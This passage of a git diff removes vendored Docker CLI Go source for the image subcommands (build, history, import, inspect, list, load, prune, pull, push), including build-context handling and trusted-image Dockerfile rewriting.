flags.StringVarP(&options.dockerfileName, "file", "f", "", "Name of the Dockerfile (Default is 'PATH/Dockerfile')") - flags.StringVarP(&options.memory, "memory", "m", "", "Memory limit") - flags.StringVar(&options.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") - flags.StringVar(&options.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB") - flags.Int64VarP(&options.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") - flags.Int64Var(&options.cpuPeriod, "cpu-period", 0, "Limit the CPU CFS (Completely Fair Scheduler) period") - flags.Int64Var(&options.cpuQuota, "cpu-quota", 0, "Limit the CPU CFS (Completely Fair Scheduler) quota") - flags.StringVar(&options.cpuSetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") - flags.StringVar(&options.cpuSetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") - flags.StringVar(&options.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container") - flags.StringVar(&options.isolation, "isolation", "", "Container isolation technology") - flags.Var(&options.labels, "label", "Set metadata for an image") - flags.BoolVar(&options.noCache, "no-cache", false, "Do not use cache when building the image") - flags.BoolVar(&options.rm, "rm", true, "Remove intermediate containers after a successful build") - flags.BoolVar(&options.forceRm, "force-rm", false, "Always remove intermediate containers") - flags.BoolVarP(&options.quiet, "quiet", "q", false, "Suppress the build output and print image ID on success") - flags.BoolVar(&options.pull, "pull", false, "Always attempt to pull a newer version of the image") - flags.StringSliceVar(&options.cacheFrom, "cache-from", []string{}, "Images to consider as cache sources") - flags.BoolVar(&options.compress, "compress", false, "Compress the build context using gzip") - flags.StringSliceVar(&options.securityOpt, "security-opt", []string{}, "Security options") - flags.StringVar(&options.networkMode, "network", "default", "Set the networking mode for the RUN instructions during build") - - command.AddTrustedFlags(flags, true) - - flags.BoolVar(&options.squash, "squash", false, "Squash newly built layers into a single new layer") - flags.SetAnnotation("squash", "experimental", nil) - flags.SetAnnotation("squash", "version", []string{"1.25"}) - - return cmd -} - -// lastProgressOutput is the same as progress.Output except -// that it only output with the last update. It is used in -// non terminal scenarios to depresss verbose messages -type lastProgressOutput struct { - output progress.Output -} - -// WriteProgress formats progress information from a ProgressReader. -func (out *lastProgressOutput) WriteProgress(prog progress.Progress) error { - if !prog.LastUpdate { - return nil - } - - return out.output.WriteProgress(prog) -} - -func runBuild(dockerCli *command.DockerCli, options buildOptions) error { - - var ( - buildCtx io.ReadCloser - err error - contextDir string - tempDir string - relDockerfile string - progBuff io.Writer - buildBuff io.Writer - ) - - specifiedContext := options.context - progBuff = dockerCli.Out() - buildBuff = dockerCli.Out() - if options.quiet { - progBuff = bytes.NewBuffer(nil) - buildBuff = bytes.NewBuffer(nil) - } - - switch { - case specifiedContext == "-": - buildCtx, relDockerfile, err = builder.GetContextFromReader(dockerCli.In(), options.dockerfileName) - case urlutil.IsGitURL(specifiedContext): - tempDir, relDockerfile, err = builder.GetContextFromGitURL(specifiedContext, options.dockerfileName) - case urlutil.IsURL(specifiedContext): - buildCtx, relDockerfile, err = builder.GetContextFromURL(progBuff, specifiedContext, options.dockerfileName) - default: - contextDir, relDockerfile, err = builder.GetContextFromLocalDir(specifiedContext, options.dockerfileName) - } - - if err != nil { - if options.quiet && urlutil.IsURL(specifiedContext) { - fmt.Fprintln(dockerCli.Err(), progBuff) - } - return fmt.Errorf("unable to prepare context: %s", err) - } - - if tempDir != "" { - defer os.RemoveAll(tempDir) - contextDir = tempDir - } - - if buildCtx == nil { - // And canonicalize dockerfile name to a platform-independent one - relDockerfile, err = archive.CanonicalTarNameForPath(relDockerfile) - if err != nil { - return fmt.Errorf("cannot canonicalize dockerfile path %s: %v", relDockerfile, err) - } - - f, err := os.Open(filepath.Join(contextDir, ".dockerignore")) - if err != nil && !os.IsNotExist(err) { - return err - } - defer f.Close() - - var excludes []string - if err == nil { - excludes, err = dockerignore.ReadAll(f) - if err != nil { - return err - } - } - - if err := builder.ValidateContextDirectory(contextDir, excludes); err != nil { - return fmt.Errorf("Error checking context: '%s'.", err) - } - - // If .dockerignore mentions .dockerignore or the Dockerfile - // then make sure we send both files over to the daemon - // because Dockerfile is, obviously, needed no matter what, and - // .dockerignore is needed to know if either one needs to be - // removed. The daemon will remove them for us, if needed, after it - // parses the Dockerfile. Ignore errors here, as they will have been - // caught by validateContextDirectory above. - var includes = []string{"."} - keepThem1, _ := fileutils.Matches(".dockerignore", excludes) - keepThem2, _ := fileutils.Matches(relDockerfile, excludes) - if keepThem1 || keepThem2 { - includes = append(includes, ".dockerignore", relDockerfile) - } - - compression := archive.Uncompressed - if options.compress { - compression = archive.Gzip - } - buildCtx, err = archive.TarWithOptions(contextDir, &archive.TarOptions{ - Compression: compression, - ExcludePatterns: excludes, - IncludeFiles: includes, - }) - if err != nil { - return err - } - } - - ctx := context.Background() - - var resolvedTags []*resolvedTag - if command.IsTrusted() { - translator := func(ctx context.Context, ref reference.NamedTagged) (reference.Canonical, error) { - return TrustedReference(ctx, dockerCli, ref, nil) - } - // Wrap the tar archive to replace the Dockerfile entry with the rewritten - // Dockerfile which uses trusted pulls. - buildCtx = replaceDockerfileTarWrapper(ctx, buildCtx, relDockerfile, translator, &resolvedTags) - } - - // Setup an upload progress bar - progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(progBuff, true) - if !dockerCli.Out().IsTerminal() { - progressOutput = &lastProgressOutput{output: progressOutput} - } - - var body io.Reader = progress.NewProgressReader(buildCtx, progressOutput, 0, "", "Sending build context to Docker daemon") - - var memory int64 - if options.memory != "" { - parsedMemory, err := units.RAMInBytes(options.memory) - if err != nil { - return err - } - memory = parsedMemory - } - - var memorySwap int64 - if options.memorySwap != "" { - if options.memorySwap == "-1" { - memorySwap = -1 - } else { - parsedMemorySwap, err := units.RAMInBytes(options.memorySwap) - if err != nil { - return err - } - memorySwap = parsedMemorySwap - } - } - - var shmSize int64 - if options.shmSize != "" { - shmSize, err = units.RAMInBytes(options.shmSize) - if err != nil { - return err - } - } - - authConfigs, _ := dockerCli.GetAllCredentials() - buildOptions := types.ImageBuildOptions{ - Memory: memory, - MemorySwap: memorySwap, - Tags: options.tags.GetAll(), - SuppressOutput: options.quiet, - NoCache: options.noCache, - Remove: options.rm, - ForceRemove: options.forceRm, - PullParent: options.pull, - Isolation: container.Isolation(options.isolation), - CPUSetCPUs: options.cpuSetCpus, - CPUSetMems: options.cpuSetMems, - CPUShares: options.cpuShares, - CPUQuota: options.cpuQuota, - CPUPeriod: options.cpuPeriod, - CgroupParent: options.cgroupParent, - Dockerfile: relDockerfile, - ShmSize: shmSize, - Ulimits: options.ulimits.GetList(), - BuildArgs: runconfigopts.ConvertKVStringsToMapWithNil(options.buildArgs.GetAll()), - AuthConfigs: authConfigs, - Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()), - CacheFrom: options.cacheFrom, - SecurityOpt: options.securityOpt, - NetworkMode: options.networkMode, - Squash: options.squash, - } - - response, err := dockerCli.Client().ImageBuild(ctx, body, buildOptions) - if err != nil { - if options.quiet { - fmt.Fprintf(dockerCli.Err(), "%s", progBuff) - } - return err - } - defer response.Body.Close() - - err = jsonmessage.DisplayJSONMessagesStream(response.Body, buildBuff, dockerCli.Out().FD(), dockerCli.Out().IsTerminal(), nil) - if err != nil { - if jerr, ok := err.(*jsonmessage.JSONError); ok { - // If no error code is set, default to 1 - if jerr.Code == 0 { - jerr.Code = 1 - } - if options.quiet { - fmt.Fprintf(dockerCli.Err(), "%s%s", progBuff, buildBuff) - } - return cli.StatusError{Status: jerr.Message, StatusCode: jerr.Code} - } - } - - // Windows: show error message about modified file permissions if the - // daemon isn't running Windows. - if response.OSType != "windows" && runtime.GOOS == "windows" && !options.quiet { - fmt.Fprintln(dockerCli.Err(), `SECURITY WARNING: You are building a Docker image from Windows against a non-Windows Docker host. All files and directories added to build context will have '-rwxr-xr-x' permissions. It is recommended to double check and reset permissions for sensitive files and directories.`) - } - - // Everything worked so if -q was provided the output from the daemon - // should be just the image ID and we'll print that to stdout. - if options.quiet { - fmt.Fprintf(dockerCli.Out(), "%s", buildBuff) - } - - if command.IsTrusted() { - // Since the build was successful, now we must tag any of the resolved - // images from the above Dockerfile rewrite. - for _, resolved := range resolvedTags { - if err := TagTrusted(ctx, dockerCli, resolved.digestRef, resolved.tagRef); err != nil { - return err - } - } - } - - return nil -} - -type translatorFunc func(context.Context, reference.NamedTagged) (reference.Canonical, error) - -// validateTag checks if the given image name can be resolved. -func validateTag(rawRepo string) (string, error) { - _, err := reference.ParseNamed(rawRepo) - if err != nil { - return "", err - } - - return rawRepo, nil -} - -var dockerfileFromLinePattern = regexp.MustCompile(`(?i)^[\s]*FROM[ \f\r\t\v]+(?P[^ \f\r\t\v\n#]+)`) - -// resolvedTag records the repository, tag, and resolved digest reference -// from a Dockerfile rewrite. -type resolvedTag struct { - digestRef reference.Canonical - tagRef reference.NamedTagged -} - -// rewriteDockerfileFrom rewrites the given Dockerfile by resolving images in -// "FROM " instructions to a digest reference. `translator` is a -// function that takes a repository name and tag reference and returns a -// trusted digest reference. -func rewriteDockerfileFrom(ctx context.Context, dockerfile io.Reader, translator translatorFunc) (newDockerfile []byte, resolvedTags []*resolvedTag, err error) { - scanner := bufio.NewScanner(dockerfile) - buf := bytes.NewBuffer(nil) - - // Scan the lines of the Dockerfile, looking for a "FROM" line. - for scanner.Scan() { - line := scanner.Text() - - matches := dockerfileFromLinePattern.FindStringSubmatch(line) - if matches != nil && matches[1] != api.NoBaseImageSpecifier { - // Replace the line with a resolved "FROM repo@digest" - ref, err := reference.ParseNamed(matches[1]) - if err != nil { - return nil, nil, err - } - ref = reference.WithDefaultTag(ref) - if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() { - trustedRef, err := translator(ctx, ref) - if err != nil { - return nil, nil, err - } - - line = dockerfileFromLinePattern.ReplaceAllLiteralString(line, fmt.Sprintf("FROM %s", trustedRef.String())) - resolvedTags = append(resolvedTags, &resolvedTag{ - digestRef: trustedRef, - tagRef: ref, - }) - } - } - - _, err := fmt.Fprintln(buf, line) - if err != nil { - return nil, nil, err - } - } - - return buf.Bytes(), resolvedTags, scanner.Err() -} - -// replaceDockerfileTarWrapper wraps the given input tar archive stream and -// replaces the entry with the given Dockerfile name with the contents of the -// new Dockerfile. Returns a new tar archive stream with the replaced -// Dockerfile. -func replaceDockerfileTarWrapper(ctx context.Context, inputTarStream io.ReadCloser, dockerfileName string, translator translatorFunc, resolvedTags *[]*resolvedTag) io.ReadCloser { - pipeReader, pipeWriter := io.Pipe() - go func() { - tarReader := tar.NewReader(inputTarStream) - tarWriter := tar.NewWriter(pipeWriter) - - defer inputTarStream.Close() - - for { - hdr, err := tarReader.Next() - if err == io.EOF { - // Signals end of archive. - tarWriter.Close() - pipeWriter.Close() - return - } - if err != nil { - pipeWriter.CloseWithError(err) - return - } - - content := io.Reader(tarReader) - if hdr.Name == dockerfileName { - // This entry is the Dockerfile. Since the tar archive was - // generated from a directory on the local filesystem, the - // Dockerfile will only appear once in the archive. - var newDockerfile []byte - newDockerfile, *resolvedTags, err = rewriteDockerfileFrom(ctx, content, translator) - if err != nil { - pipeWriter.CloseWithError(err) - return - } - hdr.Size = int64(len(newDockerfile)) - content = bytes.NewBuffer(newDockerfile) - } - - if err := tarWriter.WriteHeader(hdr); err != nil { - pipeWriter.CloseWithError(err) - return - } - - if _, err := io.Copy(tarWriter, content); err != nil { - pipeWriter.CloseWithError(err) - return - } - } - }() - - return pipeReader -} diff --git a/vendor/github.com/docker/docker/cli/command/image/cmd.go b/vendor/github.com/docker/docker/cli/command/image/cmd.go deleted file mode 100644 index c3ca61f85b..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/cmd.go +++ /dev/null @@ -1,33 +0,0 @@ -package image - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewImageCommand returns a cobra command for `image` subcommands -func NewImageCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "image", - Short: "Manage images", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - NewBuildCommand(dockerCli), - NewHistoryCommand(dockerCli), - NewImportCommand(dockerCli), - NewLoadCommand(dockerCli), - NewPullCommand(dockerCli), - NewPushCommand(dockerCli), - NewSaveCommand(dockerCli), - NewTagCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - newInspectCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/image/history.go b/vendor/github.com/docker/docker/cli/command/image/history.go deleted file mode 100644 index 91c8f75a63..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/history.go +++ /dev/null @@ -1,99 +0,0 @@ -package image - -import ( - "fmt" - "strconv" - "strings" - "text/tabwriter" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" - "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type historyOptions struct { - image string - - human bool - quiet bool - noTrunc bool -} - -// NewHistoryCommand creates a new `docker history` command -func NewHistoryCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts historyOptions - - cmd := &cobra.Command{ - Use: "history [OPTIONS] IMAGE", - Short: "Show the history of an image", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.image = args[0] - return runHistory(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.human, "human", "H", true, "Print sizes and dates in human readable format") - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - - return cmd -} - -func runHistory(dockerCli *command.DockerCli, opts historyOptions) error { - ctx := context.Background() - - history, err := dockerCli.Client().ImageHistory(ctx, opts.image) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - - if opts.quiet { - for _, entry := range history { - if opts.noTrunc { - fmt.Fprintf(w, "%s\n", entry.ID) - } else { - fmt.Fprintf(w, "%s\n", stringid.TruncateID(entry.ID)) - } - } - w.Flush() - return nil - } - - var imageID string - var createdBy string - var created string - var size string - - fmt.Fprintln(w, "IMAGE\tCREATED\tCREATED BY\tSIZE\tCOMMENT") - for _, entry := range history { - imageID = entry.ID - createdBy = strings.Replace(entry.CreatedBy, "\t", " ", -1) - if !opts.noTrunc { - createdBy = stringutils.Ellipsis(createdBy, 45) - imageID = stringid.TruncateID(entry.ID) - } - - if opts.human { - created = units.HumanDuration(time.Now().UTC().Sub(time.Unix(entry.Created, 0))) + " ago" - size = units.HumanSizeWithPrecision(float64(entry.Size), 3) - } else { - created = time.Unix(entry.Created, 0).Format(time.RFC3339) - size = strconv.FormatInt(entry.Size, 10) - } - - fmt.Fprintf(w, "%s\t%s\t%s\t%s\t%s\n", imageID, created, createdBy, size, entry.Comment) - } - w.Flush() - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/image/import.go b/vendor/github.com/docker/docker/cli/command/image/import.go deleted file mode 100644 index 60024fb53c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/import.go +++ /dev/null @@ -1,88 +0,0 @@ -package image - -import ( - "io" - "os" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - dockeropts "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/pkg/urlutil" - "github.com/spf13/cobra" -) - -type importOptions struct { - source string - reference string - changes dockeropts.ListOpts - message string -} - -// NewImportCommand creates a new `docker import` command -func NewImportCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts importOptions - - cmd := &cobra.Command{ - Use: "import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]", - Short: "Import the contents from a tarball to create a filesystem image", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.source = args[0] - if len(args) > 1 { - opts.reference = args[1] - } - return runImport(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - opts.changes = dockeropts.NewListOpts(nil) - flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image") - flags.StringVarP(&opts.message, "message", "m", "", "Set commit message for imported image") - - return cmd -} - -func runImport(dockerCli *command.DockerCli, opts importOptions) error { - var ( - in io.Reader - srcName = opts.source - ) - - if opts.source == "-" { - in = dockerCli.In() - } else if !urlutil.IsURL(opts.source) { - srcName = "-" - file, err := os.Open(opts.source) - if err != nil { - return err - } - defer file.Close() - in = file - } - - source := types.ImageImportSource{ - Source: in, - SourceName: srcName, - } - - options := types.ImageImportOptions{ - Message: opts.message, - Changes: opts.changes.GetAll(), - } - - clnt := dockerCli.Client() - - responseBody, err := clnt.ImageImport(context.Background(), source, opts.reference, options) - if err != nil { - return err - } - defer responseBody.Close() - - return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/inspect.go b/vendor/github.com/docker/docker/cli/command/image/inspect.go deleted file mode 100644 index 217863c772..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/inspect.go +++ /dev/null @@ -1,44 +0,0 @@ -package image - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - refs []string -} - -// newInspectCommand creates a new cobra.Command for `docker image inspect` -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] IMAGE [IMAGE...]", - Short: "Display detailed information on one or more images", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.refs = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - getRefFunc := func(ref string) (interface{}, []byte, error) { - return client.ImageInspectWithRaw(ctx, ref) - } - return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/list.go b/vendor/github.com/docker/docker/cli/command/image/list.go deleted file mode 100644 index 679604fc02..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/list.go +++ /dev/null @@ -1,96 +0,0 @@ -package image - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type imagesOptions struct { - matchName string - - quiet bool - all bool - noTrunc bool - showDigests bool - format string - filter opts.FilterOpt -} - -// NewImagesCommand creates a new `docker images` command -func NewImagesCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := imagesOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "images [OPTIONS] [REPOSITORY[:TAG]]", - Short: "List images", - Args: cli.RequiresMaxArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - if len(args) > 0 { - opts.matchName = args[0] - } - return runImages(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs") - flags.BoolVarP(&opts.all, "all", "a", false, "Show all images (default hides intermediate images)") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - flags.BoolVar(&opts.showDigests, "digests", false, "Show digests") - flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := *NewImagesCommand(dockerCli) - cmd.Aliases = []string{"images", "list"} - cmd.Use = "ls [OPTIONS] [REPOSITORY[:TAG]]" - return &cmd -} - -func runImages(dockerCli *command.DockerCli, opts imagesOptions) error { - ctx := context.Background() - - filters := opts.filter.Value() - if opts.matchName != "" { - filters.Add("reference", opts.matchName) - } - - options := types.ImageListOptions{ - All: opts.all, - Filters: filters, - } - - images, err := dockerCli.Client().ImageList(ctx, options) - if err != nil { - return err - } - - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().ImagesFormat) > 0 && !opts.quiet { - format = dockerCli.ConfigFile().ImagesFormat - } else { - format = formatter.TableFormatKey - } - } - - imageCtx := formatter.ImageContext{ - Context: formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewImageFormat(format, opts.quiet, opts.showDigests), - Trunc: !opts.noTrunc, - }, - Digest: opts.showDigests, - } - return formatter.ImageWrite(imageCtx, images) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/load.go b/vendor/github.com/docker/docker/cli/command/image/load.go deleted file mode 100644 index 988f5106e2..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/load.go +++ /dev/null @@ -1,77 +0,0 @@ -package image - -import ( - "fmt" - "io" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/pkg/system" - "github.com/spf13/cobra" -) - -type loadOptions struct { - input string - quiet bool -} - -// NewLoadCommand creates a new `docker load` command -func NewLoadCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts loadOptions - - cmd := &cobra.Command{ - Use: "load [OPTIONS]", - Short: "Load an image from a tar archive or STDIN", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runLoad(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.input, "input", "i", "", "Read from tar archive file, instead of STDIN") - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Suppress the load output") - - return cmd -} - -func runLoad(dockerCli *command.DockerCli, opts loadOptions) error { - - var input io.Reader = dockerCli.In() - if opts.input != "" { - // We use system.OpenSequential to use sequential file access on Windows, avoiding - // depleting the standby list un-necessarily. On Linux, this equates to a regular os.Open. - file, err := system.OpenSequential(opts.input) - if err != nil { - return err - } - defer file.Close() - input = file - } - - // To avoid getting stuck, verify that a tar file is given either in - // the input flag or through stdin and if not display an error message and exit. - if opts.input == "" && dockerCli.In().IsTerminal() { - return fmt.Errorf("requested load from stdin, but stdin is empty") - } - - if !dockerCli.Out().IsTerminal() { - opts.quiet = true - } - response, err := dockerCli.Client().ImageLoad(context.Background(), input, opts.quiet) - if err != nil { - return err - } - defer response.Body.Close() - - if response.Body != nil && response.JSON { - return jsonmessage.DisplayJSONMessagesToStream(response.Body, dockerCli.Out(), nil) - } - - _, err = io.Copy(dockerCli.Out(), response.Body) - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/image/prune.go b/vendor/github.com/docker/docker/cli/command/image/prune.go deleted file mode 100644 index 82c28fcf49..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/prune.go +++ /dev/null @@ -1,92 +0,0 @@ -package image - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool - all bool -} - -// NewPruneCommand returns a new cobra prune command for images -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - cmd := &cobra.Command{ - Use: "prune [OPTIONS]", - Short: "Remove unused images", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - spaceReclaimed, output, err := runPrune(dockerCli, opts) - if err != nil { - return err - } - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) - return nil - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") - flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images, not just dangling ones") - - return cmd -} - -const ( - allImageWarning = `WARNING! This will remove all images without at least one container associated to them. -Are you sure you want to continue?` - danglingWarning = `WARNING! This will remove all dangling images. -Are you sure you want to continue?` -) - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { - pruneFilters := filters.NewArgs() - pruneFilters.Add("dangling", fmt.Sprintf("%v", !opts.all)) - - warning := danglingWarning - if opts.all { - warning = allImageWarning - } - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { - return - } - - report, err := dockerCli.Client().ImagesPrune(context.Background(), pruneFilters) - if err != nil { - return - } - - if len(report.ImagesDeleted) > 0 { - output = "Deleted Images:\n" - for _, st := range report.ImagesDeleted { - if st.Untagged != "" { - output += fmt.Sprintln("untagged:", st.Untagged) - } else { - output += fmt.Sprintln("deleted:", st.Deleted) - } - } - spaceReclaimed = report.SpaceReclaimed - } - - return -} - -// RunPrune calls the Image Prune API -// This returns the amount of space reclaimed and a detailed output string -func RunPrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) { - return runPrune(dockerCli, pruneOptions{force: true, all: all}) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/pull.go b/vendor/github.com/docker/docker/cli/command/image/pull.go deleted file mode 100644 index 24933fe846..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/pull.go +++ /dev/null @@ -1,84 +0,0 @@ -package image - -import ( - "errors" - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -type pullOptions struct { - remote string - all bool -} - -// NewPullCommand creates a new `docker pull` command -func NewPullCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pullOptions - - cmd := &cobra.Command{ - Use: "pull [OPTIONS] NAME[:TAG|@DIGEST]", - Short: "Pull an image or a repository from a registry", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.remote = args[0] - return runPull(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.all, "all-tags", "a", false, "Download all tagged images in the repository") - command.AddTrustedFlags(flags, true) - - return cmd -} - -func runPull(dockerCli *command.DockerCli, opts pullOptions) error { - distributionRef, err := reference.ParseNamed(opts.remote) - if err != nil { - return err - } - if opts.all && !reference.IsNameOnly(distributionRef) { - return errors.New("tag can't be used with --all-tags/-a") - } - - if !opts.all && reference.IsNameOnly(distributionRef) { - distributionRef = reference.WithDefaultTag(distributionRef) - fmt.Fprintf(dockerCli.Out(), "Using default tag: %s\n", reference.DefaultTag) - } - - // Resolve the Repository name from fqn to RepositoryInfo - repoInfo, err := registry.ParseRepositoryInfo(distributionRef) - if err != nil { - return err - } - - ctx := context.Background() - - authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) - requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "pull") - - // Check if reference has a digest - _, isCanonical := distributionRef.(reference.Canonical) - if command.IsTrusted() && !isCanonical { - err = trustedPull(ctx, dockerCli, repoInfo, distributionRef, authConfig, requestPrivilege) - } else { - err = imagePullPrivileged(ctx, dockerCli, authConfig, distributionRef.String(), requestPrivilege, opts.all) - } - if err != nil { - if strings.Contains(err.Error(), "target is plugin") { - return errors.New(err.Error() + " - Use `docker plugin install`") - } - return err - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/image/push.go b/vendor/github.com/docker/docker/cli/command/image/push.go deleted file mode 100644 index a8ce4945ec..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/push.go +++ /dev/null @@ -1,61 +0,0 @@ -package image - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -// NewPushCommand creates a new `docker push` command -func NewPushCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "push [OPTIONS] NAME[:TAG]", - Short: "Push an image or a repository to a registry", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runPush(dockerCli, args[0]) - }, - } - - flags := cmd.Flags() - - command.AddTrustedFlags(flags, true) - - return cmd -} - -func runPush(dockerCli *command.DockerCli, remote string) error { - ref, err := reference.ParseNamed(remote) - if err != nil { - return err - } - - // Resolve the Repository name from fqn to RepositoryInfo - repoInfo, err := registry.ParseRepositoryInfo(ref) - if err != nil { - return err - } - - ctx := context.Background() - - // Resolve the Auth config relevant for this server - authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) - requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "push") - - if command.IsTrusted() { - return trustedPush(ctx, dockerCli, repoInfo, ref, authConfig, requestPrivilege) - } - - responseBody, err := imagePushPrivileged(ctx, dockerCli, authConfig, ref.String(), requestPrivilege) - if err != nil { - return err - } - - defer responseBody.Close() - return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil) -} diff --git a/vendor/github.com/docker/docker/cli/command/image/remove.go b/vendor/github.com/docker/docker/cli/command/image/remove.go deleted file mode 100644 index c79ceba7a8..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/remove.go +++ /dev/null @@ -1,77 